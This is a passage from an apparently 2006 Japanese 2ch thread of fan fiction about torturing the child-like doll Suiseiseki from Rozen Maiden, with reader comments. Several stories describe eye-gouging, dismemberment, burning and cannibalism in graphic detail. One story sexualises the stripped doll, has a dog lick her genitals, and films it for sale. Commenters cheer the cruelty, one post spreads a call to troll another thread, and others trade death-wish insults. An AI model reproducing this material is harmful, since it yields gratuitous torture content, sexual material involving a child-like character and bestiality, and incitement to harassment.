気力なく反抗する翠星石。先ほどのゲロがよほど堪えたらしい。
「とにかくさっさと動け!」
「はい・・・ですぅ」
動かなくなった足の変わりに手を使って地べたを這いずるように動く翠星石。
そこでまたデュードの蹴りを喰らい、吹っ飛ぶ翠星石。
「きたねえな!そんなゲロのついた服を床に擦り付けるんじゃねえよ!新品のカーペットが汚れるだろうが!」
そう言ってデュードは翠星石の上着をすべて破り捨てた。
「きゃあ!なにをするんですか!」
「こういう時だけ威勢が良いんだな。ゲロより上着を剥がれる方が堪えるのか?なら下着も剥ぎ取ってやるぜ!」
「きゃあああ!やめるですぅ!」
デュードは翠星石の抵抗などに動じず下着を破き、彼女を裸にしてしまった。
「うう・・・酷いですぅ・・・大切な翠星石の服を・・・う、えっぐ・・・私も乙女だというのに・・・」
「知るかよクズ!さっさと机の上掃除しろ!」
雑巾を翠星石の顔に向かって投げつけた。
机を拭きながらペン立てを整理する翠星石。
だがその時彼女の怒りが炸裂した。
「この最低人間!死にやがれです!消えちまえです!」
机の上に散らばる文房具をがむしゃらに投げつける翠星石。
「うお!おい!やめろ!」
鋏やカッターなどの刃物も飛んでくる。
「おい!やめろっつってんだろうが!」
切れたデュードは手持ちのデザートイーグルを天井に向けて発砲した。
はっ、と我に返る翠星石。
「あ、い、今のはわざとじゃないです!つい魔が指して・・・だ、だから許してくださいですぅ!」
「キレちまったよぉ。たたじゃすまさねえぜ翠星石!」
即座に立ち上がったデュードは手元に転がった鋏を手に取った。
「これでも喰らいやがれ!」
その鋏を翠星石の右目に突き刺した。
「きゃああああああああああ!目がああああああ!痛い痛い痛い痛い!助けてえええ!」
あまりの痛さに絶叫する翠星石。
「もう片方もだ!」
今度は左目に刃をすべて出し切ったカッターをズブズブと突き刺していく。
「あああああああああ!!!!やめて!ですうぅぅくdjfkldjふぇいあfだkふぁ!!」
両目を潰されて混乱する翠星石。
「痛いですぅ!!!目が見えないですぅ!!!真っ暗ですぅ!!!」
「まだ終わらねえよ!」

609 :名無しかわいいよ名無し:2006/03/06(月) 04:37:45 ID:Y0jZ3mFp
デュードはナタで胴体を切断した。
「ううう・・・痛いですぅ!もうこうなったらさっさと楽にしやがれですぅ!」
「ほう、そう来たか。だがその前に俺に仕返しくらいはしたいだろう?このナイフを受け取れ」
そう言って目の見えない翠星石の右手にナイフを渡す。
「最後なんだから思いっきり力を込めて刺してくれて結構だぜ」
「言われなくてもやってやるです!死んじまえです!」
ザクリと何かに刺さる音が聞こえた。
「す、翠星石・・・ありがとう・・・これで僕も安らかに眠れるよ」
「え?その声は、そ、そ、そ、そ、蒼星石!?」
「ああ、そうそう。お前の隣には哀れな妹の体置いといたから。おまえにトドメ刺されるなんてこいつにとっても本望じゃねえか」
自らの手で妹を殺めてしまった翠星石。
「蒼星石・・・いやああああああああああああ!!!」
喚く翠星石に蹴りが飛ぶ。
「うるせえっつってんだろうが!」
そしてハンマーを取り出すデュード。
「じゃ、これで最後の願いは聞いた。あばよ翠星石!」
巨大なスレッジハンマーが翠星石の頭めがけて振り下ろされる。
ッグチャっという音を立てて翠星石の頭は砕け散った。
体は無残にもピクピクと痙攣している。
「よし、今日のお掃除完了。寝るとするか」
尚、彼がどうやって蒼星石を手に入れたかについてはわからない。
それこそ死神デュードのなせる神業ならぬ死神技だろう。

To Be Continued

610 :名無しかわいいよ名無し:2006/03/06(月) 04:40:43 ID:9AhV1Ypd
翠石星で工作してみた。http://o.pic.to/79bjn

611 :名無しかわいいよ名無し:2006/03/06(月) 10:29:46 ID:RzLKYv0t
ローゼンのキャラはみな被虐キャラとして完成されているように思う

612 :名無しかわいいよ名無し:2006/03/06(月) 14:07:23 ID:+8eDfyPf

    , .-=- ,、
 ヽr'._ rノ.'   ',
 //`Y. , '´ ̄`ヽ
 i | 丿. i ノ '\@
 ヽ>,/! ヾ(i.゚ ヮ゚ノ 
  `ー -(kOi∞iミつ 
      (,,( ),,)
.       じ'ノ'

↓のスレでカナたちと一緒にお話してほしいのかしら〜
http://human5.2ch.net/test/read.cgi/dame/1141377363/l50

613 :名無しかわいいよ名無し:2006/03/06(月) 16:49:07 ID:Xj8hOcMS
緑は口調が五月蝿くて服装が農民で性悪で髪が縦うんこロールだからなぁ




614 :名無しかわいいよ名無し:2006/03/06(月) 18:10:35 ID:RpPcKvCg
なんのかんのいって、俺はこのスレ好きだw
なんか虐待虐殺、イジメ、コメディ、どのSSを見てもけっこうレベル高いし。

いろんな板に翠スレ乱立してるけど、そこに書かれてる翠SSのほとんどは
翠星石と二人暮らしでツンデレするも、もはやラブラブで、
翠星石は翠星石でお父様やジュンや蒼星石や真紅たちを綺麗さっぱり忘れてるわ、鞄に寝ないで主人公のいっしょの布団で寝るわで
翠星石という名前であることと毒舌ってことを除けば、もはや翠星石である必要の無い
脳内嫁妄想垂れ流しSSばっかりなんだよな。

それにくらべてここでは例えばデュードの虐殺では「すこやかににびやかに」とか「夢の世界」「チビ樹」とか
翠星石というキャラの特性うまくつかんでるし、他の虐殺物も「お父様に作ってもらった体」とか翠×ジュンとか翠×蒼とか
翠星石ならでの要素がちゃんと出てくるんだよな。

バレンタインデー・ネタも他スレみたいに安易にツンデレしないで翠の可愛らしさをやたらデティールを細かく表現して
見事にそれらを粉砕してくれていて心地良いし、リレー物のトニーシリーズもみんな上手いなぁって感心させられるし、
537みたいな翠自爆コメディも実際に原作の1エピソードとして書かれてもおかしくないようなクオリティがあるし、

なんというかハイクオリティなんだよなこのスレのSS。これほど翠のことを知りつくして把握してるやつらって他のスレにはないよマジで。

長くなったが、要するに翠虐待虐殺AA&SS職人たちGJ!これからもどんどんやってくれ!楽しみにしてるぜ!ってことで。


615 :名無しかわいいよ名無し:2006/03/06(月) 18:25:59 ID:437eIaHL
ド−ルだからかな?どんな虐待・虐殺スレよりも
神聖な感じがする‥。

616 :名無しかわいいよ名無し:2006/03/06(月) 19:12:07 ID:v4pKqSVG
>>614
切り出してまとめHPに掲載したいので、差し支えなければ他のSS載ってるスレを教えていただければと・・

617 :名無しかわいいよ名無し:2006/03/06(月) 20:19:32 ID:RpPcKvCg
>>616
アニメ、漫画スレ、大学生活スレとか草加スレとか服飾板のゴスロリスレとかetc.

618 :名無しかわいいよ名無し:2006/03/06(月) 21:00:25 ID:v4pKqSVG
>>617
思ってたより多いですな・・とりあえずそれらの板をチェックしてみますわ

619 :名無しかわいいよ名無し:2006/03/06(月) 21:39:30 ID:Fm2/N7YP
>>616 結構荒らしや愉快犯のコピペ厨による重複も多いからご注意。
コピペ重複を省けばそんなに膨大な数じゃないと思うよ。
ただ、ここの内容は、あんまりofficialにしないほうがよろ。
俺もそうだが、萌や愛情の裏返しじゃなくてマジで嫌悪ぶつける文章も多いから、
なるべく内輪にするほうがいいだろう。ただでさえ、今ここはage晒されてるから。
他スレからの愉快犯も侵入させたくないしな。

さ、て、もっと ク ソ ミ ド リ を 虐 め て や ろ う ぜ !
鞄の中を腐敗物で満タンにして、その中にクソミドリうずめて鍵しめてやろうか

620 :名無しかわいいよ名無し:2006/03/06(月) 22:12:59 ID:RpPcKvCg
ま、いざとなったらSM板でやるというのも一つの手だな。
板が板だけに文句は言えんだろww

621 :名無しかわいいよ名無し:2006/03/06(月) 23:38:53 ID:v4pKqSVG
>>619
キャラ個別板の蒼星石虐待スレもやってるので、虐待だから・・という事で問題にはならないかと
切り出した作品しか置いてませんし

ただ私は虐待読むの辛い人なので、作業してて気分がみるみる下降しましたw
(なんでそんな奴が虐待スレにいるとかそういうのは無しでひとつ)

622 :名無しかわいいよ名無し:2006/03/06(月) 23:47:06 ID:cMNo7rli
確かにデュードとか鬼畜すぎるけど、他の虐待SSにもいえるけ
ど、原作の基礎はしっかり取り入れてるよな。

623 :名無しかわいいよ名無し:2006/03/07(火) 04:37:45 ID:5V6WPdic
「待って、蒼星石!なぜ翠星石を見捨てるですかぁ!」
翠星石を払いのけるようにして遠のいていく蒼星石。
「君みたいな出来の悪い姉とはもう関わりたくないんだ。グズで泣き虫で人見知りで。本当にジャンクだよ」
「な・・・いくら蒼星石でも言いすぎです!」
「僕は知ったんだ。君みたいな子と姉妹であるという汚らわしい事実を。あの人は僕を救ってくれた」
「それは騙されているだけです!だから・・・見捨てないで蒼星石!」
とうとう翠星石は泣き出してしまった。
「相変わらずだなあ翠星石!残念だがお前の妹は俺の手駒となったぜ」
翠星石の前に現れたのはサングラスをつけた男。そう、死神ことデュードである。
「デュード!妹まで利用して・・・本当に酷いやつです!」
それを聞いた蒼星石は鋏で翠星石を跳ね飛ばした。
「きゃあ!何をするんですか蒼星石!」
「デュードさんの悪口は許さないよ!彼は僕の心の柵を取り払ってくれた。そして今は君を傷つけるのがとても気持ち良い」
「いい子だぜぇ、蒼星石。そのままアリスゲームを開始だ!バラバラにしてやりな!」

624 :名無しかわいいよ名無し:2006/03/07(火) 04:38:56 ID:5V6WPdic
デュードの言う通りに従う蒼星石。
「ま、待つです!あなたは操られているんです!目を覚ますです!」
だが蒼星石の耳には届かない。鋏を構えたまま突っ込んだ蒼星石は、すれ違いざまに翠星石の右手を切り落とした。
「きゃあああ!どうして・・・こんなひどいことを!」
泣きながら問いかける翠星石に蒼星石は冷たい視線を送る。
「言ったでしょ。君を殺すのは僕の本望であり、デュードさんの望みでもあるんだ」
翠星石はデュードを睨みつけた。
「デュード!蒼星石に何を吹き込んだのですか!っぎゃあ!」
翠星石の左手の平に鋏が突き刺さる。
「デュードさんに対して失礼だよ翠星石。もう少し態度を改めるんだね」
それを見てデュードは蒼星石に近づいて頭を撫でた。
「まあ落ち着けよ。ところでさっきの質問の答えだ翠星石」
デュードは緑色の液体の入った注射器を取り出した。そしてそれを翠星石の腕に注入する。
「ううう・・・ぐえええええ!!!こ、これは・・・」
デュードはニヤニヤ笑って
「そいつは特別な薬でなあ。どんなやつでも気分良くなる魔法の薬だぜぇ」
「ま、まさか、それを蒼星石に!うっぐぅぇぇぇ・・・」
気持ちが悪くなって翠星石はゲロを吐いてしまった。
「翠星石、僕はこれのおかげで救われたんだ。何をするにも君が壁として立ちはだかる。でもこの薬はそんなものをぶち壊してくれた。そして君を壊せば僕は完璧になる!」
蒼星石は鋏を翠星石の腹に突き刺した。
「あああ!そ、そうせ・・・」
「まだ息があるのか!喰らえ!」
さらに鋏を引っこ抜き、今度は胴体を挟んで切断した。
「もう、やめて・・・蒼星石・・・」
まだ生きていることに蒼星石は焦った。
「っく!もう一度!」
もう一度鋏を振りかざした時、頭から水のようなものが降り注いだ。
「蒼星石、こいつで目を覚ませ」
デュードはガソリンタンクを蒼星石の頭から振りかけた。同様にそれを翠星石にも施す。
「さあ蒼星石、このマッチを彼女に投げつけるんだ。そうすりゃ一発であの世行きだ」
「ありがとうデュードさん。翠星石!これが最後だ!」
「だ、だめです!それは!」
だが時すでに遅し、蒼星石の摺ったマッチは翠星石に投げ放たれた。
「!?」
するとガソリンにどっぷりつかった蒼星石の体は燃え始めた。
「うわああああ!!!体が!熱い!助けて!」
「へっへっへ!いい燃えざまだぜ蒼星石!」
「蒼星石!」
翠星石も叫ぶ。
「あ、熱い!熱いよ!助けて!デュードさん!」
「そのまま燃えちまえ!」
燃えさかる炎に焼かれてのたうち回る蒼星石。
「蒼星石!早く水を!スィドリーム!」
如雨露を取り出す翠星石。
「あ!」
だがデュードに腕を切断されてしまった。
「邪魔させねえぜ!」
「うあああああ!苦し・・・いよ・・・助けて・・・翠・・・星石・・・」
やがて蒼星石の体は動かなくなった。
「あ・・・あ・・・あ、蒼星石いいいいいい!!!」
翠星石は絶叫した。だがそんな彼女に追い討ちをかけるようにデュードは彼女の首を刀で切断し、放火した。
「いい幕間だったぜ。断ち切ろうにも結局最後に呼んだ名前は姉の名前。情けねえ野郎だぜ蒼星石。2部はいつになるかな、へっへっへ」

625 :人形師:2006/03/07(火) 08:42:11 ID:IrD5xnYv
「うぅ…ここはどこです?」
翠星石はあたりを見回す、ここはどこかの工房のようだ。

首をめぐらすと、自分のすぐ横の台に寝かせられてる蒼星石が見えた。「蒼星石?!蒼星石ッ!」
翠星石は蒼星石に必死に呼び掛けた。だが蒼星石は無残にも手足がもげ、あちこち焼け焦げたジャンクになっていた。
もはや彼女はもの言わぬ骸と化していた…

「蒼…星石…」
呼んでも無駄だということはわかっていた。
あそこまでになってしまったらもうどうしようもないのだから…

(ギィィィィ…)
誰かが扉をあけて工房へ入ってきたようだ。

626 :人形師:2006/03/07(火) 08:53:32 ID:IrD5xnYv
「だ、誰ですか?」
翠星石は目をこらした。その人物はポケットの中に工具一式が入った大きな前掛けをした男だった。

男は台に近寄ると蒼星石の前にかがみこんだ。焼け残った服をめくったり、頭の後ろをしげしげ見つめている。
「いきなりなんですか?オマエは!?蒼星石の体を舐め回すように…
この変態野郎です!おいそこの奴!聞いてやがるのかですぅ!」

だが男は聞こえてないようだった。
ただひたすらジャンクの蒼星石をみつめているだけだった。

627 :人形師:2006/03/07(火) 09:27:02 ID:IrD5xnYv
やがて男は歓喜の声をあげた。
「やっぱりだ!こいつはあの伝説の薔薇乙女シリーズの1体だ!すごいぞ!だけどだいぶ痛んでしまってる…無理もないか、幻といわれる人形だ、
現存していたとしてもこうして破損していても不思議じゃない。でも僕はツイてるぞ、もしかしたらこいつを直せるかもしれないんだ」

「なんですって?蒼星石を直す?こいつがですか?」
翠星石は期待に目を輝かせた。

蒼星石が生き返るかも知れない!なんと心の踊ることか?!

だが翠星石は状況がまだよくわかっていなかった。

628 :名無しかわいいよ名無し:2006/03/07(火) 09:54:54 ID:IrD5xnYv
携帯からじゃツライ。
家帰ってからPCから続き書く。

629 :名無しかわいいよ名無し:2006/03/07(火) 09:57:30 ID:NzfNhhdO
>>628
GJ!引き続きwktk

630 :名無しかわいいよ名無し:2006/03/07(火) 10:20:25 ID:TZo5kaJq
焼け焦げたとか出てきたから続き?
それにしても相変わらずデュード編は面白いわw
今回の姉妹合わせて精神的、肉体的な陵辱は完璧。

631 :名無しかわいいよ名無し:2006/03/07(火) 14:52:14 ID:nPrEeo+F
>>604のつづき
ポリッ
人間は手にしたものを口に入れた。すべてを食べるのはあっという間だった。
「やわらかくておいしいな」
「なんてことしやがるです」
グイ
わずかに残っている前髪をつかみ翠星石は宙吊りにされた。
「ヒッ、痛いですぅ。もう嫌です、やめてほしいです」
「なんか言ったか」
人間は翠星石をもったまま歩き、再びフックにかけた。外れないように念入りに。
「も、元通りですか。結局」
「逃げられるわけねえだろ」
そして人間はペンチを取り出し、左足の親指にあてた。
「おいしそう」
「バカ人間、何する気ですか! やめるです!」
ポキ
「ふぎゃ!」
人間はペンチで親指をねじりとった。そして用意してあった小皿のマヨネーズにそれをつけると口の中へ。
コリ
「まことに美味なり!」
「人形の指食べるなんて・・・」
人間は再びペンチを手に取り残りの指を取りにかかった。
ポキ コロン ポキ コロン ポキ コロン ポキ コロン
「フギャァァァァァァァァァァァァァ!」
翠星石が悲鳴を上げる。それをBGMにして人間は床に転がった埃まみれの指をマヨネーズにつけすべて口に入れた。
「コリコリしておいしいな♪ 最高!」
「ひどいですぅ、いつまでこんなことを・・・」
ブゥーーーーーン ギュュュュュュ
突如荒々しい機械音が倉庫に響き渡った。人間が床においてあったチェーンソーの電源を入れたのだ。翠星石の顔の前へと持ってくる。
「・・・嫌です。嫌ですぅぅぅぅぅぅぅぅぅぅぅぅぅぅぅ!」
「同じことしか言わないね、ヒヒヒ」
人間はチェーンソーを翠星石の膝に当てた。
ガリ ガリ ガリ ポキィィィィィィン コローーーーーン
「ヒギャァァァァァァァァァ! 痛いです! もうやめてですぅ! 翠星石が悪かったです! だからやめて・・・」
そんなことを翠星石が言っている間に左ひざより下は切断された。
「さすがチェーンソー! 糸鋸なんかより早いぜ!!」
そう言うと人間は落ちた翠星石のパーツにむしゃぶりついた。
「うめぇぇぇぇぇぇぇ!」
ガシュ クチャ クチャ クチャ ガシュ クチャ クチャ クチャ
「うっ、く、くるっていやがるですぅ・・・。オエェェェェェ」
気分が悪くなった翠星石は吐いた。

632 :人形師:2006/03/07(火) 20:29:10 ID:hV1+Gb5W
蒼星石が直る...!その期待に胸をときめかす翠星石
「直る?蒼星石がですか?そ、それは本当ですか?だったら早くするです!」
だが、男はどこ吹く風というように翠星石の問いかけを無視し、ただただ自分に言い聞かせるようにつぶやくばかり。
「大丈夫、できるできる。さいわいなことに質ははるかに落ちるけど同じ作家の作った人形も偶然手に入った。
 こいつを流用すれば、あの薔薇乙女を修復できるはずだ」

「こいつ、翠星石を無視するかですぅ!さっきから何をブツブツほざいていやがるですか!?」
腹をたてた翠星石は飛び起きようとした...が、翠星石の体は台にベルトのようなものでくくりつけられていたため、
翠星石はせいぜい手足をバタつかせることしかできなかった。
と、男が蒼星石の前から立ち上がり翠星石のほうに近づいてきた。翠星石は男の顔を見た。
これといって特徴のない顔だった、ただアルカイックスマイルとでもいうような仏像のようなあいまいな微笑だけが嫌に気になるというか...
「な、なな何をするかですぅ?な、なにヘラヘラしてるですか?」
翠星石は男の慈愛すら感じ取れる穏やかな笑みに言い知れぬ不安を感じていた。背中に汗まで感じていた。
男が翠星石の胸元のリボンに手を伸ばしてきた。ごく自然に。そして服のリボンをするすると解いていく。
「ちょ、何をするです!このスケベ野郎!いきなり脱がすなんて何しやがるですか!」
手足をバタつかせる翠星石だったが、男は手際よく翠星石の服を脱がしてしまった。男は脱がした服を裏地をめくったりして丹念に調べる。
「ふぅ〜ん...縫製もところどころいい加減だな...表面はまあまあだが...見えないところは適当に作ってあるな...生地もとりたてて良い物というワケでもなし。
 ま、物が物だけに期待はしてなかったけどね」
「なッ?お、お父様が翠星石のためにしつらえてくれた服になんて言い草ですぅ!目が腐ってやがるです!」
だが翠星石の侮蔑の言葉にも男は表情を変えることなくただ冷静に
「...会話機能を持っているのか...なんとも下世話というか、くだらないというか...至高の人形美の追求には不必要なものだな...
 とはいえ、伝説の人形師といえ人の子、生活していくために下賎の好事家の注文に答えてこんなくだらん物を作ることもあったのだろうな」



633 :人形師:2006/03/07(火) 20:52:30 ID:hV1+Gb5W
「く...くだらない?!翠星石がくだらないですって〜っ!!こ、このローゼンメイデン第3ドールの翠星石を『くだならい物』とはとんだ侮辱ですぅ〜〜手を!手をついて額を地べたにこすり付けて謝れです!
 そして泣いて許しをこきやがれですぅ〜〜!!!」
「ふん...何を言うかと思えば...ローゼンの第3ドールだって?こんなまがい物があのローゼンの究極の薔薇乙女シリーズのわけがないだろう?
 服は生地も縫製もいい加減な安物、全体的なコンセプトもアレ(と言って蒼星石を指差す)とは比べものにならないくらい劣ってる。
 アレなんて服は表地から裏地まで高級品、かつオートクチュールだし、人形本体の質やデザインも極上の物だ!
 アレこそまさに至高の薔薇乙女だよ...!素晴らしい...美しいよ...
 それにひきかえお前ときたら...余ったパーツの寄せ集めじゃないか?お前のその『ウリ』であろう会話機能もイカレまくってしまってるし。
 おおかたお前のその『第3ドール』云々というふれこみは、ローゼンが注文主の客をごまかすためにお前に植え付けた、おためごかしに違いないさ」

「そ、そんな...翠星石が欠陥品のローゼンメイデンじゃない、まがい物なんて、そんなことあるもんですかあああ!!翠星石と蒼星石は双子の姉妹ですぅ〜〜!!!
 それが、違うだなんて...そんなそんな、そんなことあるものですかああああ!!、う、うわああああああああああ〜〜んっ!!!!!」
 

634 :名無しかわいいよ名無し:2006/03/07(火) 20:59:18 ID:km4ua2uw
>>633
  r@" ̄~@ヽ
  /ノリリリハリリハ
 ノ从リ@-゚ノ从
`ノ从とiξiつハ
ノリ从く"ξ">リ从
   "UU"

「他人事とは思えない……。」

635 :名無しかわいいよ名無し:2006/03/07(火) 22:32:19 ID:jzlU7AA2
>>634 君はエンジュ大先生の最高傑作だから、もっと誇りを抱いてくれたまえ
クソミドリなんて薔薇水様の何百万分の1にも及ばない。ミドリはジャンク以下
クソミドリをローゼンシリーズから永久欠番にして追放し、
薔薇水様をこそ迎え入れたいものだね。薔薇&雪華、これこそ美しき姉妹だよ。

636 :名無しかわいいよ名無し:2006/03/07(火) 22:39:29 ID:jzlU7AA2
もし、あの忌々しいクソミドリが微塵でも君を蔑するならば
私は嬉々として、あのミドリのゴミ人形の四肢を粉々に打ち砕いて
凌遅の刑にして差上げよう。紫の姫君の前に、あまりにも下賤で、ガサツで、
汚らしく穢らわしい。どこぞのミドリ信者の眼前で、翠ドルフィーを
焼き祓って差上げたいくらいだよ。

637 :名無しかわいいよ名無し:2006/03/07(火) 22:44:44 ID:jzlU7AA2
真紅・雛・蒼・金・水銀・雪華・薔薇>>--絶対越えられない壁-->>
>>-------ヒマラヤ山脈------->>-------オリンポス山------->>クソミドリ

638 :ソフトな作品:2006/03/07(火) 23:51:57 ID:wq1Fw/AY
>>3-5
>>8
>>9-10
>>11-13
>>15
>>16-19
>>21-22
>>24-26
>>27-31
>>32





639 :ソフトな作品:2006/03/07(火) 23:52:56 ID:wq1Fw/AY
>>33
>>33-34
>>48
>>52
>>53
>>57-59
>>60-61
>>64-67
>>77

640 :ソフトな作品:2006/03/07(火) 23:56:29 ID:wq1Fw/AY
>>80
>>98-99
>>124
>>158-159
>>169
>>219-223
>>232-233
>>256
>>263-265
>>408


641 :ソフトな作品:2006/03/07(火) 23:57:42 ID:wq1Fw/AY
>>438-442
>>508
>>537-539
>>573>>578


642 :名無しかわいいよ名無し:2006/03/08(水) 00:23:17 ID:9+fsG/SS
害人害人害人害害人害人害人害人害人害人害人害人害人害人害人人害人害人害人害人害人害人害人
害人害人害人害人害人害人害人害人害人害人害人害人害人害人害人害人害人害人害人害人害人害人
クソミドリというが、世間からしてみればお前らが
クソクソクソクソクソクソクソクソクソクソクソクソクソクソクソクソクソ
二次元キャラに嫌悪感ある時点で
ガキがきがきがきがきがきがきがきがきがきがきがきがきがきがきがきがきがきがき
ジャンクになれといってるみたいだが、お前らがはすでに人間界での
ジャンクジャンクジャンクジャンクジャンクジャンクジャンクジャンク
ジャンクジャンクジャンクジャンク
ジャンクジャンクジャンクジャンク
脳内でやれよ。あ、お前らはジャンクだから、脳の容量は
ミニミニミニミニミニミニミニミニだもんな
作者の気持ちを
考えてみろ考えてみろ考えてみろ考えてみろ考えてみろ考えてみろ
考えてみろ考えてみろ考えてみろ考えてみろ考えてみろ考えてみろ考えてみろ
このスレは
閉鎖閉鎖閉鎖閉鎖閉鎖閉鎖閉鎖しろとの声が高まっている模様。
結論を言おう


         死ね






643 :名無しかわいいよ名無し:2006/03/08(水) 00:29:56 ID:2YNGIPKW
>>642
お前マジで痛いよ
文句があるならこのスレを見なけりゃいいだろ
知障はとっとと病院にいきましょうね( ´,_ゝ`)プッ


644 :名無しかわいいよ名無し:2006/03/08(水) 00:41:21 ID:SGJkPDVv
荒らしはスルー コレ原則。 そもそもジャンクにジャンクと返すような
陳腐な輩など論外。翠はミドリのドレスを被ったゴミ。これも永久不変の原則

645 :名無しかわいいよ名無し:2006/03/08(水) 00:47:19 ID:SGJkPDVv
生ゴミ汚物と一緒に翠を鞄に詰めて、燃えないゴミの日に出しましょう
それがローゼンメイデンシリーズの面汚しを効率よく浄化する最適手段 

646 :名無しかわいいよ名無し:2006/03/08(水) 00:54:21 ID:SGJkPDVv
あの口汚い下賤でガサツな糞ゴミ人形のせいで、世間一般のアンティークドールの
高貴で気高いイメージや、ドルフィーファンの婦女子のドールに対する幻想が
大きく穢されたことは間違いないと思うよ。翠星石の存在は、ドールという芸術そのものに泥を塗りつけ
唾を吐きかけるが如し、なのだよ。そんなイラナイゴミ人形なんてカエレ!


647 :名無しかわいいよ名無し:2006/03/08(水) 00:58:09 ID:SGJkPDVv
『おのれをしりやがれですぅ!』ハァ?おめぇ、何様のつもり?
この台詞聞いた瞬間、俺はマツオの眼前でモノホンの翠の人形を壊してやりたくなったよ。
コレはもっともっと虐待せねば。まだまだナマヌルイな。

648 :名無しかわいいよ名無し:2006/03/08(水) 01:06:30 ID:2YNGIPKW
>>644-647
GJ!

649 :名無しかわいいよ名無し:2006/03/08(水) 01:10:48 ID:9+fsG/SS
ホント馬鹿多いな
二次元と現実の区別つかなくなったクチだろ?
>>643〜647
一人で必死にガンバしてるあほだなおい。
知障とはお前のことで、人間のごみでもあるよおまえ。
むしろ、ただの人形より価値ないな。
結論

          死ねよ

650 :名無しかわいいよ名無し:2006/03/08(水) 02:38:47 ID:nmcIQzsx
  ┌─‐「][]             _,ィ ´ ̄`ヽ、
    ̄ ̄} |       _      /:.ゝ-─‐<>
   r─' ノ       「Y {´ ̄`ン':.:.:.:.:.:.:.:.:.:.:.:.:}{
     ̄        Lハj_, ィ'´⌒⌒ヽ、:.:.:.ィ、ハ
   [[] 「}     _/∠二ニニニ¬、_ハ:.:.:.ヽヽ',
    rー'_ノ      //´ 了~~~⌒~`ヽ.弋゙Tl:.:.:.:_j」 l
           { {   {        j} }士ぅ'´:.:_〉|
          い、__ >、___ __, ィ人 ヽく_:./:.〉ゝ
   ィ ⌒ >'/  い 〉~~〉T~~T<   ヽハ 〈_:.く
  (    _ イ    `7  ハ⊥__j_i___〉  ,}イ 〈_/
  ( >>649 _)    ハ__厶>ー‐一_7  /´
  ゝ ___,ノ    /ーY):::ノ ` ̄´厶.、/_
            {::::::::/     /⌒ー'::::::}
              ̄´     {:::::::::;: ィ´
                    ̄´


651 :名無しかわいいよ名無し:2006/03/08(水) 06:26:47 ID:vlSpi4tT
208 名前:名無しさん [2006/03/08(水) 00:33 ID:Hl1ky4ho]
http://comic6.2ch.net/test/read.cgi/cchara/1135788876/
変態どもの集まりだから、好きなだけ荒していいよ。
反応もおもしろいっす


652 :名無しかわいいよ名無し:2006/03/08(水) 07:47:15 ID:/MaQGhkz
食料の買出しから帰ってきたデュード。
「おら!さっさと起きろクズ!」
トレーラーハウスの前に横たわる翠星石を蹴り飛ばす。
「っきゃ!な、なんですかぁ・・・」
翠星石はぶるぶると震えている。
「飯だよ。*ロッキーロードだ。ほら食え」
*ロッキーロード:チョコレートのお菓子。かなり甘い
「あ、ありがとうですぅ」
翠星石は目の前に放り投げられたロッキーロードを手に取り、貪りはじめた。
「きたねえ食い方だな。ローゼンメイデンとやらの欠片もねえ」
デュードは近づいて翠星石の顔をまじまじと見つめた。
「な、なんですか・・・」
「お前本当に人形か?このクロッチー人形とは似てもにつかねえぜ」
デュードは異形な人形を翠星石に見せた。
「こんなヘンテコな人形と一緒にするなですぅ!翠星石たちローゼンメイデンは完璧を求められた少女なんですから!」
流石にこんな人形と比べられては翠星石のプライドも傷つくだろう。彼女は怒った。
「そうかい。だが今のお前もこいつと変わらないぜ。主人に弄ばれるままに動く人形。結局そんなもんだよものなんて」
「翠星石をもの呼ばわりするんですか!いい加減にするです!」
ここでいつものデュードなら蹴っているところだろう。だが今回は違った。
「どうせ人間に飼いならされるだけのものさ。証拠を見せてやるよ。来いよ、チャンプ!」
デュードがそう呼ぶと、どこからか犬がやって来た。
「っひ!い、犬ですぅ!」
翠星石は怯えてデュードの後ろに隠れた。
「安心しろって。こいつは賢いからお前を食ったりしないぜ。こういうことしたりしない限りなあ!」
「きゃあ!」
デュードは翠星石にオレンジジュースを振り掛け、チャンプの前に突き出した。
するとチャンプは翠星石に襲い掛かる。

653 :名無しかわいいよ名無し:2006/03/08(水) 07:47:58 ID:/MaQGhkz
「きゃあ!こら、やめるです!」
顔を舐め回される翠星石。さらにジュースで塗れた服にまで噛み付かれる。
「ああ!翠星石のドレスが!離すです!」
翠星石が強く引っ張ると、ドレスは破れてしまった。
「ドレスが破れてしまったですぅ!この犬!なにするんですか!」
翠星石はチャンプに蹴りを喰らわせた。キャウンと鳴いて吹っ飛ぶチャンプ。
「暴力はいけないぜ翠星石ちゃんよ!」
今度はデュードは翠星石にドロドロに溶けたチョコレートを振りかける。
「うう、ベトベトするです・・・これはチョコレート?」
「おいで、チャンプ、こいつの服ごと喰っちまいな!」
チャンプは勢い良く翠星石に飛び掛った。先ほどよりもより一層激しくなって。
チャンプは牙を剥き出しにし、服どころか下着まで食い千切ってしまった。
「もうやめてですぅ!翠星石のドレスがぁ!」
裸にされて泣きじゃくる翠星石。デュードはそれをビデオカメラでまじまじと撮影している。
「へっへっへ!人形じゃねえってことを証明してもらうぜえ。このビデオはネットで売り捌いてやるか。きっと高く売れるぜ」
「や、や、やめるですぅ!こんな姿を他の人に見られるなんて!」
翠星石は顔を真っ赤にした。
「うるせえ!人形に黙秘権はねえ!」
「デュード!お前は最低の人間ですぅ!腐ってるですぅ!」
「黙ってろよ!おおそうだ。人形と人間様でどこが違うか生殖器確かめりゃわかるぜ!」
「え?何するですか!?」
「丁度ワレメついてるしこりゃあいい。チャンプ、ここを舐めてやれ!」
「ちょ、ちょっと!何してるですか!やめるです!あ・・・」
デュードは暴れる翠星石の恥部にチョコレートを塗ってやった。
すかさずチャンプはそこに襲い掛かる。
「あ・・や・・・ああ・・・」
翠星石は吐息を荒くした。
「へっへっへ!そのままイっちまうか?人形のイく姿なんてレアものだぜ!こいつは値が付きそうだ!」
デュードが一人盛り上がる一方、翠星石はなんとも言いがたい表情をしていた。
「あ・・・ああ・・も、もうだめえ!」
翠星石はぐったりしてしまった。チャンプはそんな翠星石に小便をかけて小屋に戻っていった。
「ひっひっひ!いいものが撮れたぜ!さあてさっそくオークションにでも出すかな」

後日
「お〜い翠星石、お前のオナニービデオ10万で売れたぜ!落札者は〜と、Jun=Sakuradaだってよ」
「ジュン・サクラダ?ジュンのことですか!あいつがこんなものを見るなんて!ああ、恥ずかしいですぅ!」
「こんなの落とすなんてよっぽどのマニアだぜ!しかもそれがお前の最愛の人物なんて、これほどケッサクなことはないぜ!」

To Be Continued

654 :名無しかわいいよ名無し:2006/03/08(水) 09:19:46 ID:vCzcX3Uz
>>652-653
GJ!
デュード編っていつもハード系ばかりだけど、ソフト系も結構上手いじゃん。


655 :名無しかわいいよ名無し:2006/03/08(水) 11:57:14 ID:6sArrvPr
